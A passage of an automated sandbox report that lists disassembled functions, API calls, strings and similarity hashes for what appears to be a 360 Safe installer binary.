CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,0000002C), ref: 00ADE925
DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,0000002C), ref: 00ADE92E

Strings

%s\%s.tf, xrefs: 00ADE8B8

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: FileH_prolog3$CloseCreateDeleteHandleWrite_memset_wcslen
String ID: %s\%s.tf
API String ID: 3257772056-3749842194
Opcode ID: 48b5d7f62a5655441468ae66744881f6891a98e3d8059ed886ad80ed2f3fb73e
Instruction ID: 38d5efa29f511b33c20b47824ba89cb2256a5e4c8b82e7c6671cd7fa39cbf308
Opcode Fuzzy Hash: 48b5d7f62a5655441468ae66744881f6891a98e3d8059ed886ad80ed2f3fb73e
Instruction Fuzzy Hash: 1A41A57190014CAFDB25EFA4DD46AFE7BB8FF04310F04412AF916AB291DB709A45CB61

Function 00A79990 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 106synchronizationCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(C8A14FE6,?,?,?,?,?,?,?,00B2CB6B,000000FF), ref: 00A799D6

Part of subcall function 00A795F0: _vswprintf_s.LIBCMT ref: 00A7961A

CreateMutexW.KERNEL32(00000000,00000001,?,?,?,?,?,?,?,?,00B2CB6B,000000FF), ref: 00A79A0C
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00B2CB6B,000000FF), ref: 00A79A1F
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,?,?,?,00B2CB6B,000000FF), ref: 00A79A2F

Part of subcall function 00A79FA0: GetProcessHeap.KERNEL32(00000000,00A79A51,?,?,?,?,?,?,?,?,00B2CB6B,000000FF), ref: 00A79FA3
Part of subcall function 00A79FA0: HeapAlloc.KERNEL32(00000000,00000000,000005C0,?,?,?,?,?,?,?,?,00B2CB6B,000000FF), ref: 00A79FB4

__CxxThrowException@8.LIBCMT ref: 00A79A7F
__CxxThrowException@8.LIBCMT ref: 00A79AA6

Part of subcall function 00A79DE0: _memset.LIBCMT ref: 00A79E27
Part of subcall function 00A79DE0: TlsAlloc.KERNEL32 ref: 00A79E53
Part of subcall function 00A79DE0: __CxxThrowException@8.LIBCMT ref: 00A79E73

ReleaseMutex.KERNEL32(00000000,?,?,?,?,?,?,?,?,00B2CB6B,000000FF), ref: 00A79ABE
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,00B2CB6B,000000FF), ref: 00A79AC9

Strings

1830B7BD-F7A3-4c4d-989B-C004DE465EDE, xrefs: 00A799DD
%s %u, xrefs: 00A799E2

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: Exception@8Throw$AllocHeapMutexProcess$CloseCreateCurrentErrorHandleLastObjectReleaseSingleWait_memset_vswprintf_s
String ID: %s %u$1830B7BD-F7A3-4c4d-989B-C004DE465EDE
API String ID: 996444115-332789905
Opcode ID: f955a2fc0a7c786042b06c594c165fb9c4034256f9838e6fd5be8014b41d0c2d
Instruction ID: c1a0c8fe38980b167a32e0942f504c7cb9ae2a124a0ea92e8dba125b9277590c
Opcode Fuzzy Hash: f955a2fc0a7c786042b06c594c165fb9c4034256f9838e6fd5be8014b41d0c2d
Instruction Fuzzy Hash: C531FF71901309ABDB20DF65AD45BAF7BB8EB08351F00C16AE828E3291EF348A05CB51

Function 00ACF3FF Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 104COMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 00ACF41F
GetClientRect.USER32(?,?), ref: 00ACF446
ShowWindow.USER32(?,00000005,?), ref: 00ACF4B2
GetDlgItem.USER32(?,00000415), ref: 00ACF4ED
SetWindowTextW.USER32(00000000,?), ref: 00ACF4FD
GetDlgItem.USER32(?,00000415), ref: 00ACF50D
SetWindowTextW.USER32(?,00000000), ref: 00ACF525

Strings

:, xrefs: 00ACF475
PNG, xrefs: 00ACF4CF
v, xrefs: 00ACF47C

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: Window$ItemText$ClientRectShow
String ID: :$PNG$v
API String ID: 2447831355-1942039661
Opcode ID: 2b862da9a58668d17c3bc8fa03ac264826d2ecde2a614772a4cb0f63bbed6fb0
Instruction ID: 257fd63fac9931d669e6e2740f6607e3b3afc229a242a6989b5ca723c2d37761
Opcode Fuzzy Hash: 2b862da9a58668d17c3bc8fa03ac264826d2ecde2a614772a4cb0f63bbed6fb0
Instruction Fuzzy Hash: EC417CB1900209EFEB119F64DC88EAEBBB9FF08344F10456DF615972A0EB74AA41CF50

Function 00ADA2D7 Relevance: 16.6, APIs: 11, Instructions: 85memoryCOMMON

Download Yara Rule

APIs

FindResourceW.KERNEL32(?,?,?,?,?,?,00ADA3CA,?,00000000,?), ref: 00ADA2E7
SizeofResource.KERNEL32(?,00000000,?,?,?,?,00ADA3CA,?,00000000,?), ref: 00ADA301
LoadResource.KERNEL32(?,00000000,?,?,?,?,00ADA3CA,?,00000000,?), ref: 00ADA311
LockResource.KERNEL32(00000000,?,?,?,?,00ADA3CA,?,00000000,?), ref: 00ADA318
GlobalAlloc.KERNEL32(00000000,00000000,?,?,?,?,00ADA3CA,?,00000000,?), ref: 00ADA327
GlobalFree.KERNEL32(00000000), ref: 00ADA349

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: Resource$Global$AllocFindFreeLoadLockSizeof
String ID:
API String ID: 3537612842-0
Opcode ID: 3c1948de5464c63b52d5f02041e8398a899c1bfe4085e7b5855ba657ae2c55fb
Instruction ID: 4fc1cb7e72aaf89e51e8a3a21ad3bc9ce7882fec3559f2416fe69fdec10d3de8
Opcode Fuzzy Hash: 3c1948de5464c63b52d5f02041e8398a899c1bfe4085e7b5855ba657ae2c55fb
Instruction Fuzzy Hash: 20215035100214AFDB226F66EC4CCEF3B6AEF997513244825F826DB220EB35CD529A65

Function 00ACD92B Relevance: 16.6, APIs: 11, Instructions: 75COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000005), ref: 00ACD941
ShowWindow.USER32(?,00000005), ref: 00ACD957
ShowWindow.USER32(?,00000000), ref: 00ACD987
ShowWindow.USER32(?,00000000), ref: 00ACD990
ShowWindow.USER32(?,00000000), ref: 00ACD999
ShowWindow.USER32(?,00000000), ref: 00ACD9A2
ShowWindow.USER32(?,00000000), ref: 00ACD9AE
ShowWindow.USER32(?,00000005), ref: 00ACD9B7
ShowWindow.USER32(?,00000005), ref: 00ACD9C0
ShowWindow.USER32(?,00000005), ref: 00ACD9C9
ShowWindow.USER32(?,00000005), ref: 00ACD9D2

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 281b885bc2f5a2d7a979ab879209dc794192cd3bc131de208de1902552c7e537
Instruction ID: 185d81325b8e53d7a1407e166b465bdc19c8c2a17e180d25e27183086d4667e5
Opcode Fuzzy Hash: 281b885bc2f5a2d7a979ab879209dc794192cd3bc131de208de1902552c7e537
Instruction Fuzzy Hash: F121F971101749AFDB217B66DC84FA7BFAEEF8135AF52053EE15602430CA322C51DE60

Function 6C6767C7 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 215COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6C6767E6
_wcsncpy.LIBCMT ref: 6C676813
PathRemoveFileSpecW.SHLWAPI(00000000,?,?,00000034), ref: 6C67681F
CharUpperW.USER32(6C676A66,6C6D912C,?,?,00000034), ref: 6C676847
_wcscpy.LIBCMT ref: 6C676854
__wcsnicmp.LIBCMT ref: 6C6768B4
__wcsnicmp.LIBCMT ref: 6C6768CB

Strings

\DEFAULT, xrefs: 6C67694F
default\default_theme.ui, xrefs: 6C676910

Memory Dump Source

Source File: 0000000F.00000002.2578652771.000000006C5D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 0000000F.00000002.2578613735.000000006C5D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6DB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6E0000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6FF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2579003199.000000006C700000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2579038423.000000006C706000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c5d0000_inst.jbxd

Similarity

API ID: __wcsnicmp$CharFileH_prolog3PathRemoveSpecUpper_wcscpy_wcsncpy
String ID: \DEFAULT$default\default_theme.ui
API String ID: 2079684850-3981732111
Opcode ID: 2f98f835849ac8b5fea084a757461442f542f99166bf125dac5fb87758780c07
Instruction ID: a59a968902ff5d3f233a2f52c51ea2c0d73e93e8c1c1484c3ceb3103d353abf7
Opcode Fuzzy Hash: 2f98f835849ac8b5fea084a757461442f542f99166bf125dac5fb87758780c07
Instruction Fuzzy Hash: 51817071901249DFCB14DFA8C984AEEB7B5BF49314F10442AE505E7790EB30AA08CB69

Function 00AE0691 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 140fileCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00AE06B0
PathFileExistsW.SHLWAPI(?,00000010), ref: 00AE06CC
_memset.LIBCMT ref: 00AE070A

Part of subcall function 00AB6DCF: _vswprintf_s.LIBCMT ref: 00AB6E02

Part of subcall function 00ACD71E: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000C), ref: 00ACD74A
Part of subcall function 00ACD71E: GetFullPathNameW.KERNEL32(?,00000104,?,00000000,0000018E,?,?,?,?,?,?,?,?,?,?,0000000C), ref: 00ACD767
Part of subcall function 00ACD71E: SetLastError.KERNEL32(0000007B,?,?,?,?,?,?,?,?,?,?,0000000C), ref: 00ACD77A

RemoveDirectoryW.KERNEL32(?,?), ref: 00AE083D

Part of subcall function 00ACEE1E: __EH_prolog3.LIBCMT ref: 00ACEE25

_memset.LIBCMT ref: 00AE07B9
_memset.LIBCMT ref: 00AE07FA
DeleteFileW.KERNEL32(?,?,?,?,?,?,00000010,?,?), ref: 00AE0821

Strings

%s\%s, xrefs: 00AE073F, 00AE07CE, 00AE080F
%s\*.*, xrefs: 00AE0710

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: File_memset$H_prolog3Path$DeleteDirectoryErrorExistsFindFirstFullLastNameRemove_vswprintf_s
String ID: %s\%s$%s\*.*
API String ID: 1543874411-1665845743
Opcode ID: 651e1f701079c1347dbbb31acc78079156260234d804fb7ef18b6e86354ebc0c
Instruction ID: 329372aa74fbae9afca1261070cb48618c064112deb5acf46eae0ede4e931316
Opcode Fuzzy Hash: 651e1f701079c1347dbbb31acc78079156260234d804fb7ef18b6e86354ebc0c
Instruction Fuzzy Hash: AD511C7191028DAADB24EFA5CD45FEF77ACEF08704F004429B91D97142EB74A644CBA5

Function 00AA76FE Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 137COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,?,00000006,0000044C), ref: 00AA7744

Part of subcall function 00A9E185: GetDC.USER32(?), ref: 00A9E193

Part of subcall function 00AF5546: _malloc.LIBCMT ref: 00AF5560

Part of subcall function 00AA7323: CreateCompatibleDC.GDI32(?), ref: 00AA7347
Part of subcall function 00AA7323: SelectObject.GDI32(?,?), ref: 00AA736E
Part of subcall function 00AA7323: SetViewportOrgEx.GDI32(?,?,?,00000000), ref: 00AA7387

GetClientRect.USER32(?,?), ref: 00AA77B4
GetDlgItem.USER32(?,000003E9), ref: 00AA77D0
GetClientRect.USER32(?,?), ref: 00AA780F
SetWindowPos.USER32(?,00000000,?,00000000,00000000,00000000,00000005), ref: 00AA7831
GetDlgItem.USER32(?,000003E8), ref: 00AA784D
GetClientRect.USER32(?,?), ref: 00AA7880
SetWindowPos.USER32(?,00000000,?,00000000,00000000,00000000,00000005), ref: 00AA78A3

Strings

PNG, xrefs: 00AA77E4, 00AA7861

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: ClientRectWindow$Item$CompatibleCreateObjectSelectViewport_malloc
String ID: PNG
API String ID: 3600242490-364855578
Opcode ID: 5769ce6429fe2def6dfe4436894ce4a01ac6012dbea6565df1f48c5eaa3bdb1d
Instruction ID: 729f1af5cfeccb838d7d09a6e030d265a082f87cac196e178d80ccc3b305c550
Opcode Fuzzy Hash: 5769ce6429fe2def6dfe4436894ce4a01ac6012dbea6565df1f48c5eaa3bdb1d
Instruction Fuzzy Hash: 7E51FA71900608AFDF20DFA5CD89EEEBBB9EF59700F04051EF556A72A1EB716505CB10

Function 00AD8657 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 57libraryloaderCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00AD867B
_memset.LIBCMT ref: 00AD868C
GetVersionExW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00AD86A1
GetVersionExW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00AD86B2
GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,00000000), ref: 00AD86C2
GetProcAddress.KERNEL32(00000000), ref: 00AD86C9
GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,00000000), ref: 00AD86D7

Strings

GetNativeSystemInfo, xrefs: 00AD86B8
kernel32.dll, xrefs: 00AD86BD

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: Version_memset$AddressHandleInfoModuleNativeProcSystem
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 675204089-192647395
Opcode ID: 7f18df6af455ee8a1aa5fc9e51c9a7f9f87b290223cc4e88d8d075e775bdd2e6
Instruction ID: 726de6341f350e64ba661666111f20bccd8e4777939db3de6fa209e3b140cb89
Opcode Fuzzy Hash: 7f18df6af455ee8a1aa5fc9e51c9a7f9f87b290223cc4e88d8d075e775bdd2e6
Instruction Fuzzy Hash: F3115E71D012189ADF20EBE5DC49BEE7BB8AB08719F004456F516E7180EF74D5098A55

Function 00AF3120 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 122COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00AF3142

Part of subcall function 00AF2050: _memset.LIBCMT ref: 00AF2085
Part of subcall function 00AF2050: _memset.LIBCMT ref: 00AF212B
Part of subcall function 00AF2050: _strncat.LIBCMT ref: 00AF21AF

_memset.LIBCMT ref: 00AF31C9
SHSetValueA.SHLWAPI ref: 00AF31FA
SHSetValueA.SHLWAPI(80000002,Software\360Safe\Liveup,mid_old,00000001,?,?), ref: 00AF3269
SHSetValueA.SHLWAPI(80000002,Software\360Safe\Liveup,mid,00000001,?,?), ref: 00AF3298

Strings

mid, xrefs: 00AF31E3, 00AF3289
Software\360Safe\Liveup, xrefs: 00AF31E8, 00AF325F, 00AF328E
mid_old, xrefs: 00AF325A

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: _memset$Value$_strncat
String ID: Software\360Safe\Liveup$mid$mid_old
API String ID: 2533611499-1528303271
Opcode ID: e1c029cb08031f9b2c8ebdc40b002e491ab1ad0f50b52be5557c402726536490
Instruction ID: aefc22572dbe723f8b3b3411b2c09cdec899049cf09a619ee4547b1827bf839f
Opcode Fuzzy Hash: e1c029cb08031f9b2c8ebdc40b002e491ab1ad0f50b52be5557c402726536490
Instruction Fuzzy Hash: F8411732608349ABEB31CB648C95FFB77D9AF94700F14454DFA8987181EBB19A0C8792

Function 00ADA6F2 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00ADA71F
_memset.LIBCMT ref: 00ADA72D
GetTempPathW.KERNEL32(00000400,?,?,00000000,000000CE,DLL,00000014,00A8BCDE), ref: 00ADA741
_memset.LIBCMT ref: 00ADA754

Part of subcall function 00AB12A8: _memset.LIBCMT ref: 00AB12EC
Part of subcall function 00AB12A8: CoCreateGuid.OLE32(?,?,?,00000800), ref: 00AB12F8
Part of subcall function 00AB12A8: _memset.LIBCMT ref: 00AB1309
Part of subcall function 00AB12A8: _wcsncpy.LIBCMT ref: 00AB135F

PathCombineW.SHLWAPI(?,?,?), ref: 00ADA784
_wcscat.LIBCMT ref: 00ADA796
PathFileExistsW.SHLWAPI(?), ref: 00ADA7A4

Strings

.tmp, xrefs: 00ADA790

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: _memset$Path$CombineCreateExistsFileGuidTemp_wcscat_wcsncpy
String ID: .tmp
API String ID: 2935203105-2986845003
Opcode ID: b92b797369b753765f7aebee3c2514d23ee3e5a43162c242decfac12dfb4a502
Instruction ID: 2845939bbce217da60a9179341b6162ad311a1231117a75b3af4a448fd54a77d
Opcode Fuzzy Hash: b92b797369b753765f7aebee3c2514d23ee3e5a43162c242decfac12dfb4a502
Instruction Fuzzy Hash: 8C2166B690021C6BDB10EBA5DD85EEB77BCEB4C705F0004AAB319D3141EA74EA448B60

Function 00ADBD58 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 40synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNEL32(00000000,00000001,Q360SafeInstallerMutex,Q360InstallerMainWnd,00B5BCC8,?,00A8BA36,Q360InstallerMainWnd,360Installer.exe,?), ref: 00ADBD68
GetLastError.KERNEL32 ref: 00ADBD75
CloseHandle.KERNEL32(?), ref: 00ADBD85
FindWindowW.USER32(Q360InstallerMainWnd,00000000), ref: 00ADBD92
EnterCriticalSection.KERNEL32(00B5BCE4,00000000), ref: 00ADBDA7
LeaveCriticalSection.KERNEL32(00B5BCE4,?), ref: 00ADBDBA

Strings

Q360InstallerMainWnd, xrefs: 00ADBD5C, 00ADBD8D
Q360SafeInstallerMutex, xrefs: 00ADBD5D

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: CriticalSection$CloseCreateEnterErrorFindHandleLastLeaveMutexWindow
String ID: Q360InstallerMainWnd$Q360SafeInstallerMutex
API String ID: 3748036984-533925698
Opcode ID: 84f5e90cd2785ecfc588aa0dd762f3d1479b0407e074f7385f5a2ba8b0af1bb7
Instruction ID: 4594816b7e391c912d697cce9c439b70781c5e7d35fcc03608588947b0de8d64
Opcode Fuzzy Hash: 84f5e90cd2785ecfc588aa0dd762f3d1479b0407e074f7385f5a2ba8b0af1bb7
Instruction Fuzzy Hash: 87F08C32110205EBD721DF62DD0AFAE37B9EB44B12F100429F413E3290EF70E902CA61

Function 00AF2420 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 114fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00A82750: _vswprintf_s.LIBCMT ref: 00A82783

CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,00B5CDA4,?,?), ref: 00AF2492
_memset.LIBCMT ref: 00AF24BF
_strncpy.LIBCMT ref: 00AF24FB
DeviceIoControl.KERNEL32 ref: 00AF2531
CloseHandle.KERNEL32(00000000), ref: 00AF259B

Strings

\\.\Scsi%d:, xrefs: 00AF2461
SCSIDISK, xrefs: 00AF24CD

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle_memset_strncpy_vswprintf_s
String ID: SCSIDISK$\\.\Scsi%d:
API String ID: 170396225-2176293039
